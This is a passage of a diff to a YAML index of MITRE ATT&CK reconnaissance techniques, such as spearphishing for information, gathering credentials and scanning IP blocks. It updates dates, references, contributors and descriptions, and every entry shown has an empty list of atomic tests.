+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -55971,7 +56658,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55989,47 +56676,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56038,19 +56688,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -56073,7 +56759,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56089,8 +56775,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -56116,7 +56800,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56132,8 +56816,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -56161,7 +56843,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56177,12 +56859,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56191,16 +56871,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56213,8 +56893,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56225,52 +56905,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -56292,7 +56970,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -56308,8 +56986,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -56335,7 +57011,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56353,8 +57029,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -56376,7 +57050,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56392,12 +57066,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -56407,17 +57079,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -56429,6 +57104,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56439,7 +57115,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -56449,6 +57125,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56461,6 +57141,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56483,6 +57167,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56490,9 +57178,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56551,7 +57238,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56571,7 +57258,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56593,7 +57279,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56609,12 +57295,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56683,7 +57367,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -56731,31 +57415,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56764,19 +57429,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -56834,7 +57521,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -56855,7 +57541,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56871,8 +57557,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
